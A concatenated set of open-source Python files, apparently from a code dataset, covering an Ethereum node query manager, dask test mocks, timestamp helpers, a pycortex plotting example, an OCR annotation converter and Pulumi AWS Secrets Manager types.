- message: A message containing information on what happened. Can
be populated both in case of success or failure"""
if endpoint == '':
self.web3_mapping.pop(NodeName.OWN, None)
self.own_rpc_endpoint = ''
return True, ''
# else
result, message = self.attempt_connect(name=NodeName.OWN, ethrpc_endpoint=endpoint)
if result:
log.info('Setting own node ETH RPC endpoint', endpoint=endpoint)
self.own_rpc_endpoint = endpoint
return result, message
def query(self, method: Callable, call_order: Sequence[NodeName], **kwargs: Any) -> Any:
"""Queries ethereum related data by performing the provided method to all given nodes
The first node in the call order that gets a successful response returns.
If none get a result then a remote error is raised
"""
for node in call_order:
web3 = self.web3_mapping.get(node, None)
if web3 is None and node != NodeName.ETHERSCAN:
continue
try:
result = method(web3, **kwargs)
except (
RemoteError,
requests.exceptions.RequestException,
BlockchainQueryError,
TransactionNotFound,
BlockNotFound,
BadResponseFormat,
ValueError, # Yabir saw this happen with mew node for unavailable method at node. Since it's generic we should replace if web3 implements https://github.com/ethereum/web3.py/issues/2448 # noqa: E501
) as e:
log.warning(f'Failed to query {node} for {str(method)} due to {str(e)}')
# Catch all possible errors here and just try next node call
continue
return result
# no node in the call order list was successfully queried
raise RemoteError(
f'Failed to query {str(method)} after trying the following '
f'nodes: {[str(x) for x in call_order]}. Check logs for details.',
)
def _get_latest_block_number(self, web3: Optional[Web3]) -> int:
if web3 is not None:
return web3.eth.block_number
# else
return self.etherscan.get_latest_block_number()
def get_latest_block_number(self, call_order: Optional[Sequence[NodeName]] = None) -> int:
return self.query(
method=self._get_latest_block_number,
call_order=call_order if call_order is not None else self.default_call_order(),
)
def get_historical_eth_balance(
self,
address: ChecksumEthAddress,
block_number: int,
) -> Optional[FVal]:
"""Attempts to get a historical eth balance from the local own node only.
If there is no node or the node can't query historical balance (not archive) then
returns None"""
web3 = self.web3_mapping.get(NodeName.OWN)
if web3 is None:
return None
try:
result = web3.eth.get_balance(address, block_identifier=block_number)
except (
requests.exceptions.RequestException,
BlockchainQueryError,
KeyError, # saw this happen inside web3.py if resulting json contains unexpected key. Happened with mycrypto's node # noqa: E501
):
return None
try:
balance = from_wei(FVal(result))
except ValueError:
return None
return balance
def have_archive(self, requery: bool = False) -> bool:
"""Checks to see if our own connected node is an archive node
If requery is True it always queries the node. Otherwise it remembers last query.
"""
if self.queried_archive_connection and requery is False:
return self.archive_connection
balance = self.get_historical_eth_balance(
address=string_to_ethereum_address('0x50532e4Be195D1dE0c2E6DfA46D9ec0a4Fee6861'),
block_number=87042,
)
self.archive_connection = balance is not None and balance == FVal('5.1063307')
self.queried_archive_connection = True
return self.archive_connection
def query_eth_highest_block(self) -> BlockNumber:
""" Attempts to query an external service for the block height
Returns the highest blockNumber
May Raise RemoteError if querying fails
"""
url = 'https://api.blockcypher.com/v1/eth/main'
log.debug('Querying blockcypher for ETH highest block', url=url)
eth_resp: Optional[Dict[str, str]]
try:
eth_resp = request_get_dict(url)
except (RemoteError, UnableToDecryptRemoteData, requests.exceptions.RequestException):
eth_resp = None
block_number: Optional[int]
if eth_resp and 'height' in eth_resp:
block_number = int(eth_resp['height'])
log.debug('ETH highest block result', block=block_number)
else:
block_number = self.etherscan.get_latest_block_number()
log.debug('ETH highest block result', block=block_number)
return BlockNumber(block_number)
def get_eth_balance(self, account: ChecksumEthAddress) -> FVal:
"""Gets the balance of the given account in ETH
May raise:
- RemoteError if Etherscan is used and there is a problem querying it or
parsing its response
"""
result = self.get_multieth_balance([account])
return result[account]
def get_multieth_balance(
self,
accounts: List[ChecksumEthAddress],
call_order: Optional[Sequence[NodeName]] = None,
) -> Dict[ChecksumEthAddress, FVal]:
"""Returns a dict with keys being accounts and balances in ETH
May raise:
- RemoteError if an external service such as Etherscan is queried and
there is a problem with its query.
"""
balances: Dict[ChecksumEthAddress, FVal] = {}
log.debug(
'Querying ethereum chain for ETH balance',
eth_addresses=accounts,
)
result = ETH_SCAN.call(
ethereum=self,
method_name='etherBalances',
arguments=[accounts],
call_order=call_order if call_order is not None else self.default_call_order(),
)
balances = {}
for idx, account in enumerate(accounts):
balances[account] = from_wei(result[idx])
return balances
def get_block_by_number(
self,
num: int,
call_order: Optional[Sequence[NodeName]] = None,
) -> Dict[str, Any]:
return self.query(
method=self._get_block_by_number,
call_order=call_order if call_order is not None else self.default_call_order(),
num=num,
)
def _get_block_by_number(self, web3: Optional[Web3], num: int) -> Dict[str, Any]:
"""Returns the block object corresponding to the given block number
May raise:
- RemoteError if an external service such as Etherscan is queried and
there is a problem with its query.
- BlockNotFound if number used to lookup the block can't be found. Raised
by web3.eth.get_block().
"""
if web3 is None:
return self.etherscan.get_block_by_number(num)
block_data: MutableAttributeDict = MutableAttributeDict(web3.eth.get_block(num)) # type: ignore # pylint: disable=no-member # noqa: E501
block_data['hash'] = hex_or_bytes_to_str(block_data['hash'])
return dict(block_data)
def get_code(
self,
account: ChecksumEthAddress,
call_order: Optional[Sequence[NodeName]] = None,
) -> str:
return self.query(
method=self._get_code,
call_order=call_order if call_order is not None else self.default_call_order(),
account=account,
)
def _get_code(self, web3: Optional[Web3], account: ChecksumEthAddress) -> str:
"""Gets the deployment bytecode at the given address
May raise:
- RemoteError if Etherscan is used and there is a problem querying it or
parsing its response
"""
if web3 is None:
return self.etherscan.get_code(account)
return hex_or_bytes_to_str(web3.eth.getCode(account))
def ens_reverse_lookup(self, reversed_addresses: List[ChecksumEthAddress]) -> Dict[ChecksumEthAddress, Optional[str]]: # noqa: E501
"""Performs a reverse ENS lookup on a list of addresses
Because a multicall is used, no exceptions are raised.
If any exceptions occur, they are logged and None is returned for that address.
"""
human_names: Dict[ChecksumEthAddress, Optional[str]] = {}
# Querying resolvers' addresses
resolver_params = [
EnsContractParams(address=addr, abi=ENS_ABI, method_name='resolver', arguments=_prepare_ens_call_arguments(addr)) # noqa: E501
for addr in reversed_addresses
]
resolvers_output = multicall(
ethereum=self,
calls=[(ENS_MAINNET_ADDR, _encode_ens_contract(params=params)) for params in resolver_params], # noqa: E501
)
resolvers = []
# We need a new list for reversed_addresses because not all addresses have resolver
filtered_reversed_addresses = []
# Processing resolvers query output
for reversed_addr, params, resolver_output in zip(reversed_addresses, resolver_params, resolvers_output): # noqa: E501
decoded_resolver = _decode_ens_contract(params=params, result_encoded=resolver_output)
if is_none_or_zero_address(decoded_resolver):
human_names[reversed_addr] = None
continue
try:
deserialized_resolver = deserialize_ethereum_address(decoded_resolver)
except DeserializationError:
log.error(
f'Error deserializing address {decoded_resolver} while doing reverse ens lookup', # noqa: E501
)
human_names[reversed_addr] = None
continue
resolvers.append(deserialized_resolver)
filtered_reversed_addresses.append(reversed_addr)
# Querying human names
human_names_params = [
EnsContractParams(address=resolver, abi=ENS_RESOLVER_ABI, method_name='name', arguments=_prepare_ens_call_arguments(addr)) # noqa: E501
for addr, resolver in zip(filtered_reversed_addresses, resolvers)]
human_names_output = multicall(
ethereum=self,
calls=[(params.address, _encode_ens_contract(params=params)) for params in human_names_params], # noqa: E501
)
# Processing human names query output
for addr, params, human_name_output in zip(filtered_reversed_addresses, human_names_params, human_names_output): # noqa: E501
human_names[addr] = _decode_ens_contract(params=params, result_encoded=human_name_output) # noqa: E501
return human_names
@overload
def ens_lookup(
self,
name: str,
blockchain: Literal[SupportedBlockchain.ETHEREUM] = SupportedBlockchain.ETHEREUM,
call_order: Optional[Sequence[NodeName]] = None,
) -> Optional[ChecksumEthAddress]:
...
@overload
def ens_lookup(
self,
name: str,
blockchain: Literal[
SupportedBlockchain.BITCOIN,
SupportedBlockchain.KUSAMA,
SupportedBlockchain.POLKADOT,
],
call_order: Optional[Sequence[NodeName]] = None,
) -> Optional[HexStr]:
...
def ens_lookup(
self,
name: str,
blockchain: SupportedBlockchain = SupportedBlockchain.ETHEREUM,
call_order: Optional[Sequence[NodeName]] = None,
) -> Optional[Union[ChecksumEthAddress, HexStr]]:
return self.query(
method=self._ens_lookup,
call_order=call_order if call_order is not None else self.default_call_order(),
name=name,
blockchain=blockchain,
)
@overload
def _ens_lookup(
self,
web3: Optional[Web3],
name: str,
blockchain: Literal[SupportedBlockchain.ETHEREUM],
) -> Optional[ChecksumEthAddress]:
...
@overload
def _ens_lookup(
self,
web3: Optional[Web3],
name: str,
blockchain: Literal[
SupportedBlockchain.BITCOIN,
SupportedBlockchain.KUSAMA,
SupportedBlockchain.POLKADOT,
],
) -> Optional[HexStr]:
...
def _ens_lookup(
self,
web3: Optional[Web3],
name: str,
blockchain: SupportedBlockchain = SupportedBlockchain.ETHEREUM,
) -> Optional[Union[ChecksumEthAddress, HexStr]]:
"""Performs an ENS lookup and returns address if found else None
TODO: currently web3.py 5.15.0 does not support multichain ENS domains
(EIP-2304), therefore requesting a non-Ethereum address won't use the
web3 ens library and will require to extend the library resolver ABI.
An issue in their repo (#1839) reporting the lack of support has been
created. This function will require refactoring once they include
support for EIP-2304.
https://github.com/ethereum/web3.py/issues/1839
May raise:
- RemoteError if Etherscan is used and there is a problem querying it or
parsing its response
- InputError if the given name is not a valid ENS name
"""
try:
normal_name = normalize_name(name)
except InvalidName as e:
raise InputError(str(e)) from e
resolver_addr = self._call_contract(
web3=web3,
contract_address=ENS_MAINNET_ADDR,
abi=ENS_ABI,
method_name='resolver',
arguments=[normal_name_to_hash(normal_name)],
)
if is_none_or_zero_address(resolver_addr):
return None
ens_resolver_abi = ENS_RESOLVER_ABI.copy()
arguments = [normal_name_to_hash(normal_name)]
if blockchain != SupportedBlockchain.ETHEREUM:
ens_resolver_abi.extend(ENS_RESOLVER_ABI_MULTICHAIN_ADDRESS)
arguments.append(blockchain.ens_coin_type())
try:
deserialized_resolver_addr = deserialize_ethereum_address(resolver_addr)
except DeserializationError:
log.error(
f'Error deserializing address {resolver_addr} while doing '
f'ens lookup',
)
return None
address = self._call_contract(
web3=web3,
contract_address=deserialized_resolver_addr,
abi=ens_resolver_abi,
method_name='addr',
arguments=arguments,
)
if is_none_or_zero_address(address):
return None
if blockchain != SupportedBlockchain.ETHEREUM:
return HexStr(address.hex())
try:
return deserialize_ethereum_address(address)
except DeserializationError:
log.error(f'Error deserializing address {address}')
return None
def _call_contract_etherscan(
self,
contract_address: ChecksumEthAddress,
abi: List,
method_name: str,
arguments: Optional[List[Any]] = None,
) -> Any:
"""Performs an eth_call to an ethereum contract via etherscan
May raise:
- RemoteError if there is a problem with
reaching etherscan or with the returned result
"""
web3 = Web3()
contract = web3.eth.contract(address=contract_address, abi=abi)
input_data = contract.encodeABI(method_name, args=arguments if arguments else [])
result = self.etherscan.eth_call(
to_address=contract_address,
input_data=input_data,
)
if result == '0x':
raise BlockchainQueryError(
f'Error doing call on contract {contract_address} for {method_name} '
f'with arguments: {str(arguments)} via etherscan. Returned 0x result',
)
fn_abi = contract._find_matching_fn_abi(
fn_identifier=method_name,
args=arguments,
)
output_types = get_abi_output_types(fn_abi)
output_data = web3.codec.decode_abi(output_types, bytes.fromhex(result[2:]))
if len(output_data) == 1:
# due to https://github.com/PyCQA/pylint/issues/4114
return output_data[0] # pylint: disable=unsubscriptable-object
return output_data
def _get_transaction_receipt(
self,
web3: Optional[Web3],
tx_hash: EVMTxHash,
) -> Dict[str, Any]:
if web3 is None:
tx_receipt = self.etherscan.get_transaction_receipt(tx_hash)
try:
# Turn hex numbers to int
block_number = int(tx_receipt['blockNumber'], 16)
tx_receipt['blockNumber'] = block_number
tx_receipt['cumulativeGasUsed'] = int(tx_receipt['cumulativeGasUsed'], 16)
tx_receipt['gasUsed'] = int(tx_receipt['gasUsed'], 16)
tx_receipt['status'] = int(tx_receipt.get('status', '0x1'), 16)
tx_index = int(tx_receipt['transactionIndex'], 16)
tx_receipt['transactionIndex'] = tx_index
for receipt_log in tx_receipt['logs']:
receipt_log['blockNumber'] = block_number
receipt_log['logIndex'] = deserialize_int_from_hex(
symbol=receipt_log['logIndex'],
location='etherscan tx receipt',
)
receipt_log['transactionIndex'] = tx_index
except (DeserializationError, ValueError, KeyError) as e:
msg = str(e)
if isinstance(e, KeyError):
msg = f'missing key {msg}'
log.error(
f'Couldnt deserialize transaction receipt {tx_receipt} data from '
f'etherscan due to {msg}',
)
raise RemoteError(
f'Couldnt deserialize transaction receipt data from etherscan '
f'due to {msg}. Check logs for details',
) from e
return tx_receipt
# Can raise TransactionNotFound if the user's node is pruned and transaction is old
tx_receipt = web3.eth.get_transaction_receipt(tx_hash) # type: ignore
return process_result(tx_receipt)
def get_transaction_receipt(
self,
tx_hash: EVMTxHash,
call_order: Optional[Sequence[NodeName]] = None,
) -> Dict[str, Any]:
return self.query(
method=self._get_transaction_receipt,
call_order=call_order if call_order is not None else self.default_call_order(),
tx_hash=tx_hash,
)
def _get_transaction_by_hash(
self,
web3: Optional[Web3],
tx_hash: EVMTxHash,
) -> EthereumTransaction:
if web3 is None:
tx_data = self.etherscan.get_transaction_by_hash(tx_hash=tx_hash)
else:
tx_data = web3.eth.get_transaction(tx_hash) # type: ignore
try:
transaction = deserialize_ethereum_transaction(data=tx_data, internal=False, ethereum=self) # noqa: E501
except (DeserializationError, ValueError) as e:
raise RemoteError(
f'Couldnt deserialize ethereum transaction data from {tx_data}. Error: {str(e)}',
) from e
return transaction
def get_transaction_by_hash(
self,
tx_hash: EVMTxHash,
call_order: Optional[Sequence[NodeName]] = None,
) -> EthereumTransaction:
return self.query(
method=self._get_transaction_by_hash,
call_order=call_order if call_order is not None else self.default_call_order(),
tx_hash=tx_hash,
)
def call_contract(
self,
contract_address: ChecksumEthAddress,
abi: List,
method_name: str,
arguments: Optional[List[Any]] = None,
call_order: Optional[Sequence[NodeName]] = None,
block_identifier: BlockIdentifier = 'latest',
) -> Any:
return self.query(
method=self._call_contract,
call_order=call_order if call_order is not None else self.default_call_order(),
contract_address=contract_address,
abi=abi,
method_name=method_name,
arguments=arguments,
block_identifier=block_identifier,
)
def _call_contract(
self,
web3: Optional[Web3],
contract_address: ChecksumEthAddress,
abi: List,
method_name: str,
arguments: Optional[List[Any]] = None,
block_identifier: BlockIdentifier = 'latest',
) -> Any:
"""Performs an eth_call to an ethereum contract
May raise:
- RemoteError if etherscan is used and there is a problem with
reaching it or with the returned result
- BlockchainQueryError if web3 is used and there is a VM execution error
"""
if web3 is None:
return self._call_contract_etherscan(
contract_address=contract_address,
abi=abi,
method_name=method_name,
arguments=arguments,
)
contract = web3.eth.contract(address=contract_address, abi=abi)
try:
method = getattr(contract.caller(block_identifier=block_identifier), method_name)
result = method(*arguments if arguments else [])
except (ValueError, BadFunctionCallOutput) as e:
raise BlockchainQueryError(
f'Error doing call on contract {contract_address}: {str(e)}',
) from e
return result
def get_logs(
self,
contract_address: ChecksumEthAddress,
abi: List,
event_name: str,
argument_filters: Dict[str, Any],
from_block: int,
to_block: Union[int, Literal['latest']] = 'latest',
call_order: Optional[Sequence[NodeName]] = None,
) -> List[Dict[str, Any]]:
if call_order is None: # Default call order for logs
call_order = (NodeName.OWN, NodeName.ETHERSCAN)
return self.query(
method=self._get_logs,
call_order=call_order,
contract_address=contract_address,
abi=abi,
event_name=event_name,
argument_filters=argument_filters,
from_block=from_block,
to_block=to_block,
)
def _get_logs(
self,
web3: Optional[Web3],
contract_address: ChecksumEthAddress,
abi: List,
event_name: str,
argument_filters: Dict[str, Any],
from_block: int,
to_block: Union[int, Literal['latest']] = 'latest',
) -> List[Dict[str, Any]]:
"""Queries logs of an ethereum contract
May raise:
- RemoteError if etherscan is used and there is a problem with
reaching it or with the returned result
"""
event_abi = find_matching_event_abi(abi=abi, event_name=event_name)
_, filter_args = construct_event_filter_params(
event_abi=event_abi,
abi_codec=Web3().codec,
contract_address=contract_address,
argument_filters=argument_filters,
fromBlock=from_block,
toBlock=to_block,
)
if event_abi['anonymous']:
# web3.py does not handle the anonymous events correctly and adds the first topic
filter_args['topics'] = filter_args['topics'][1:]
events: List[Dict[str, Any]] = []
start_block = from_block
if web3 is not None:
events = _query_web3_get_logs(
web3=web3,
filter_args=filter_args,
from_block=from_block,
to_block=to_block,
contract_address=contract_address,
event_name=event_name,
argument_filters=argument_filters,
)
else: # etherscan
until_block = (
self.etherscan.get_latest_block_number() if to_block == 'latest' else to_block
)
blocks_step = 300000
while start_block <= until_block:
while True: # loop to continuously reduce block range if need be
end_block = min(start_block + blocks_step, until_block)
try:
new_events = self.etherscan.get_logs(
contract_address=contract_address,
topics=filter_args['topics'], # type: ignore
from_block=start_block,
to_block=end_block,
)
except RemoteError as e:
if 'Please select a smaller result dataset' in str(e):
blocks_step = blocks_step // 2
if blocks_step < 100:
raise # stop trying
# else try with the smaller step
continue
# else some other error
raise
break # we must have a result
# Turn all Hex ints to ints
for e_idx, event in enumerate(new_events):
try:
block_number = deserialize_int_from_hex(
symbol=event['blockNumber'],
location='etherscan log query',
)
log_index = deserialize_int_from_hex(
symbol=event['logIndex'],
location='etherscan log query',
)
# Try to see if the event is a duplicate that got returned
# in the previous iteration
for previous_event in reversed(events):
if previous_event['blockNumber'] < block_number:
break
same_event = (
previous_event['logIndex'] == log_index and
previous_event['transactionHash'] == event['transactionHash']
)
if same_event:
events.pop()
new_events[e_idx]['address'] = deserialize_ethereum_address(
event['address'],
)
new_events[e_idx]['blockNumber'] = block_number
new_events[e_idx]['timeStamp'] = deserialize_int_from_hex(
symbol=event['timeStamp'],
location='etherscan log query',
)
new_events[e_idx]['gasPrice'] = deserialize_int_from_hex(
symbol=event['gasPrice'],
location='etherscan log query',
)
new_events[e_idx]['gasUsed'] = deserialize_int_from_hex(
symbol=event['gasUsed'],
location='etherscan log query',
)
new_events[e_idx]['logIndex'] = log_index
new_events[e_idx]['transactionIndex'] = deserialize_int_from_hex(
symbol=event['transactionIndex'],
location='etherscan log query',
)
except DeserializationError as e:
raise RemoteError(
f'Couldnt decode an etherscan event due to {str(e)}',
) from e
# etherscan will only return 1000 events in one go. If more than 1000
# are returned such as when no filter args are provided then continue
# the query from the last block
if len(new_events) == 1000:
start_block = new_events[-1]['blockNumber']
else:
start_block = end_block + 1
events.extend(new_events)
return events
def get_event_timestamp(self, event: Dict[str, Any]) -> Timestamp:
"""Reads an event returned either by etherscan or web3 and gets its timestamp
Etherscan events contain a timestamp. Normal web3 events don't, so it needs
to be queried from the block number.
We could also add this to the get_logs() call but it would add unnecessary
rpc calls to get_block_by_number() for each log entry. Better to have it
lazily queried like this.
TODO: Perhaps a better approach would be a log event class for this
"""
if 'timeStamp' in event:
# event from etherscan
return Timestamp(event['timeStamp'])
# event from web3
block_number = event['blockNumber']
block_data = self.get_block_by_number(block_number)
return Timestamp(block_data['timestamp'])
def _get_blocknumber_by_time_from_subgraph(self, ts: Timestamp) -> int:
"""Queries Ethereum Blocks Subgraph for closest block at or before given timestamp"""
response = self.blocks_subgraph.query(
f"""
{{
blocks(
first: 1, orderBy: timestamp, orderDirection: desc,
where: {{timestamp_lte: "{ts}"}}
) {{
id
number
timestamp
}}
}}
""",
)
try:
result = int(response['blocks'][0]['number'])
except (IndexError, KeyError) as e:
raise RemoteError(
f'Got unexpected ethereum blocks subgraph response: {response}',
) from e
else:
return result
def get_blocknumber_by_time(self, ts: Timestamp, etherscan: bool = True) -> int:
"""Searches for the blocknumber of a specific timestamp
- Performs the etherscan api call by default first
- If RemoteError raised or etherscan flag set to false
-> queries blocks subgraph
"""
if etherscan:
try:
return self.etherscan.get_blocknumber_by_time(ts)
except RemoteError:
pass
return self._get_blocknumber_by_time_from_subgraph(ts)
def get_basic_contract_info(self, address: ChecksumEthAddress) -> Dict[str, Any]:
"""
Query a contract address and return basic information as:
- Decimals
- name
- symbol
if it is provided in the contract. This method may raise:
- BadFunctionCallOutput: If there is an error calling a bad address
"""
cache = self.contract_info_cache.get(address)
if cache is not None:
return cache
properties = ('decimals', 'symbol', 'name')
info: Dict[str, Any] = {}
contract = EthereumContract(address=address, abi=ERC20TOKEN_ABI, deployed_block=0)
try:
# Output contains call status and result
output = multicall_2(
ethereum=self,
require_success=False,
calls=[(address, contract.encode(method_name=prop)) for prop in properties],
)
except RemoteError:
# If something happens in the connection the output should have
# the same length as the tuple of properties
output = [(False, b'')] * len(properties)
try:
decoded = [
contract.decode(x[1], method_name)[0] # pylint: disable=E1136
if x[0] and len(x[1]) else None
for (x, method_name) in zip(output, properties)
]
except OverflowError as e:
# This can happen when contract follows the ERC20 standard methods
# but name and symbol return bytes instead of string. UNIV1 LP is in this case
log.error(
f'{address} failed to decode as ERC20 token. Trying UNIV1 LP token. {str(e)}',
)
contract = EthereumContract(address=address, abi=UNIV1_LP_ABI, deployed_block=0)
decoded = [
contract.decode(x[1], method_name)[0] # pylint: disable=E1136
if x[0] and len(x[1]) else None
for (x, method_name) in zip(output, properties)
]
log.debug(f'{address} was successfully decoded as an ERC20 token')
for prop, value in zip(properties, decoded):
if isinstance(value, bytes):
value = value.rstrip(b'\x00').decode()
info[prop] = value
self.contract_info_cache[address] = info
return info
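# A standalone sketch of the bytes fallback applied at the end of
# get_basic_contract_info above: some non-standard tokens return zero-padded
# bytes for name/symbol, which get stripped and decoded to strings. The sample
# values in the trailing comment are made up.
def _sketch_normalize_token_properties(raw_values):
    normalized = {}
    for prop, value in raw_values.items():
        if isinstance(value, bytes):
            value = value.rstrip(b'\x00').decode()
        normalized[prop] = value
    return normalized
# e.g. _sketch_normalize_token_properties({'name': b'DAI\x00\x00', 'symbol': 'DAI', 'decimals': 18})
# returns {'name': 'DAI', 'symbol': 'DAI', 'decimals': 18}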
|
featuretools/tests/testing_utils/cluster.py
|
ridicolos/featuretools
| 942 |
85549
|
from psutil import virtual_memory
def mock_cluster(n_workers=1,
threads_per_worker=1,
diagnostics_port=8787,
memory_limit=None,
**dask_kwarg):
return (n_workers, threads_per_worker, diagnostics_port, memory_limit)
class MockClient():
def __init__(self, cluster):
self.cluster = cluster
def scheduler_info(self):
return {'workers': {'worker 1': {'memory_limit': virtual_memory().total}}}
def get_mock_client_cluster():
return MockClient, mock_cluster
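# A small sketch of how these mocks can stand in for a dask client/cluster in
# a test; the function below is illustrative and not used by the test suite.
def _example_usage():
    client_cls, cluster_fn = get_mock_client_cluster()
    client = client_cls(cluster_fn(n_workers=2))
    return client.scheduler_info()['workers']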
|
server/backend/app/db/utils/utils.py
|
chemetc/maskcam
| 179 |
85569
|
from datetime import datetime, timezone
from .enums import StatisticTypeEnum
def convert_timestamp_to_datetime(timestamp: float) -> datetime:
"""
Convert timestamp date format to datetime.
Arguments:
timestamp {float} -- Input timestamp.
Returns:
datetime -- Datetime formatted object which represents the
same information as timestamp.
"""
return datetime.fromtimestamp(timestamp, timezone.utc)
def get_enum_type(statistic_type: str) -> StatisticTypeEnum:
"""
Convert string object to enum.
Arguments:
statistic_type {str} -- Input string.
Returns:
StatisticTypeEnum -- Enum corresponding to statistic_type.
"""
return (
StatisticTypeEnum.ALERT
if statistic_type.lower() == "alerts"
else StatisticTypeEnum.REPORT
)
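# A small, illustrative usage check for the two helpers above; this function
# is hypothetical and not part of the original module.
def _example_usage():
    assert convert_timestamp_to_datetime(0.0) == datetime(1970, 1, 1, tzinfo=timezone.utc)
    assert get_enum_type("alerts") is StatisticTypeEnum.ALERT
    assert get_enum_type("report") is StatisticTypeEnum.REPORT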
|
examples/datasets/plot_volume2D.py
|
mvdoc/pycortex
| 423 |
85570
|
<reponame>mvdoc/pycortex
"""
===================
Plot 2D Volume Data
===================
This plots example volume data onto an example subject, S1, onto a flatmap
using quickflat. In order for this to run, you have to have a flatmap for
this subject in the pycortex filestore.
The cortex.Volume2D object is instantiated with two numpy arrays of the same
size as the scan for this subject and transform. Here, there are two datasets
that have been generated to look like gradients across the brain, but you can
replace these with any numpy arrays of the correct dimensionality.
The colormap used in the first two flatmaps is
.. image:: ../../../filestore/colormaps/RdBu_covar.png
As with a 1D Volume, you can change vmin and vmax to threshold, but here
they can be manipulated individually for the two arrays.
You can also change the colormap when creating a new 2D volume. The colormap
used in the last flatmap is
.. image:: ../../../filestore/colormaps/GreenWhiteBlue_2D.png
"""
import cortex
import numpy as np
import matplotlib.pyplot as plt
subject = "S1"
xfm = "fullhead"
# Creating two different test datasets that are both the same shape as this
# transform with one entry for each voxel
# The matrices have just been reordered in different ways so that they make
# gradients across the brain in different directions
test_data1 = np.arange(31 * 100 * 100).reshape((31, 100, 100), order='C')
test_data2 = np.arange(31 * 100 * 100).reshape((31, 100, 100), order='F')
# This creates a 2D Volume object for both of our test datasets for the given
# subject and transform
vol_data = cortex.Volume2D(test_data1, test_data2, subject, xfm)
cortex.quickshow(vol_data, with_colorbar=False)
plt.show()
# You can alter the minimum and maximum values shown on the colorbar and this
# can be done separately for the two different datasets
vol_data = cortex.Volume2D(test_data1, test_data2, subject, xfm,
vmin=np.mean(test_data1), vmax=np.max(test_data1),
vmin2=np.min(test_data2), vmax2=np.mean(test_data2))
cortex.quickshow(vol_data, with_colorbar=False)
plt.show()
# To change the colormap, you have to create a new Volume2D object
vol_color = cortex.Volume2D(test_data1, test_data2, subject, xfm,
cmap="GreenWhiteBlue_2D")
cortex.quickshow(vol_color, with_colorbar=False)
plt.show()
|
mmocr/utils/data_convert_util.py
|
yuexy/mmocr
| 2,261 |
85586
|
<reponame>yuexy/mmocr
# Copyright (c) OpenMMLab. All rights reserved.
import mmcv
def convert_annotations(image_infos, out_json_name):
"""Convert the annotation into coco style.
Args:
image_infos(list): The list of image information dicts
out_json_name(str): The output json filename
Returns:
out_json(dict): The coco style dict
"""
assert isinstance(image_infos, list)
assert isinstance(out_json_name, str)
assert out_json_name
out_json = dict()
img_id = 0
ann_id = 0
out_json['images'] = []
out_json['categories'] = []
out_json['annotations'] = []
for image_info in image_infos:
image_info['id'] = img_id
anno_infos = image_info.pop('anno_info')
out_json['images'].append(image_info)
for anno_info in anno_infos:
anno_info['image_id'] = img_id
anno_info['id'] = ann_id
out_json['annotations'].append(anno_info)
ann_id += 1
img_id += 1
cat = dict(id=1, name='text')
out_json['categories'].append(cat)
if len(out_json['annotations']) == 0:
out_json.pop('annotations')
mmcv.dump(out_json, out_json_name)
return out_json
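# A minimal usage sketch for convert_annotations above; the image and
# annotation dicts are illustrative placeholders rather than a real dataset.
def _example_convert():
    image_infos = [
        dict(
            file_name='img_0.jpg',
            height=100,
            width=200,
            anno_info=[
                dict(
                    iscrowd=0,
                    category_id=1,
                    bbox=[10, 10, 20, 20],
                    area=400,
                    segmentation=[[10, 10, 30, 10, 30, 30, 10, 30]],
                ),
            ],
        ),
    ]
    return convert_annotations(image_infos, 'coco_style_example.json')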
|
sdk/python/pulumi_aws/secretsmanager/outputs.py
|
RafalSumislawski/pulumi-aws
| 260 |
85590
|
<filename>sdk/python/pulumi_aws/secretsmanager/outputs.py<gh_stars>100-1000
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'SecretReplica',
'SecretRotationRotationRules',
'SecretRotationRules',
'GetSecretRotationRotationRuleResult',
'GetSecretRotationRuleResult',
]
@pulumi.output_type
class SecretReplica(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "kmsKeyId":
suggest = "kms_key_id"
elif key == "lastAccessedDate":
suggest = "last_accessed_date"
elif key == "statusMessage":
suggest = "status_message"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SecretReplica. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SecretReplica.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SecretReplica.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
region: str,
kms_key_id: Optional[str] = None,
last_accessed_date: Optional[str] = None,
status: Optional[str] = None,
status_message: Optional[str] = None):
"""
:param str region: Region for replicating the secret.
:param str kms_key_id: ARN, Key ID, or Alias.
:param str last_accessed_date: Date that you last accessed the secret in the Region.
:param str status: Status can be `InProgress`, `Failed`, or `InSync`.
:param str status_message: Message such as `Replication succeeded` or `Secret with this name already exists in this region`.
"""
pulumi.set(__self__, "region", region)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if last_accessed_date is not None:
pulumi.set(__self__, "last_accessed_date", last_accessed_date)
if status is not None:
pulumi.set(__self__, "status", status)
if status_message is not None:
pulumi.set(__self__, "status_message", status_message)
@property
@pulumi.getter
def region(self) -> str:
"""
Region for replicating the secret.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[str]:
"""
ARN, Key ID, or Alias.
"""
return pulumi.get(self, "kms_key_id")
@property
@pulumi.getter(name="lastAccessedDate")
def last_accessed_date(self) -> Optional[str]:
"""
Date that you last accessed the secret in the Region.
"""
return pulumi.get(self, "last_accessed_date")
@property
@pulumi.getter
def status(self) -> Optional[str]:
"""
Status can be `InProgress`, `Failed`, or `InSync`.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="statusMessage")
def status_message(self) -> Optional[str]:
"""
Message such as `Replication succeeded` or `Secret with this name already exists in this region`.
"""
return pulumi.get(self, "status_message")
@pulumi.output_type
class SecretRotationRotationRules(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "automaticallyAfterDays":
suggest = "automatically_after_days"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SecretRotationRotationRules. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SecretRotationRotationRules.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SecretRotationRotationRules.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
automatically_after_days: int):
"""
:param int automatically_after_days: Specifies the number of days between automatic scheduled rotations of the secret.
"""
pulumi.set(__self__, "automatically_after_days", automatically_after_days)
@property
@pulumi.getter(name="automaticallyAfterDays")
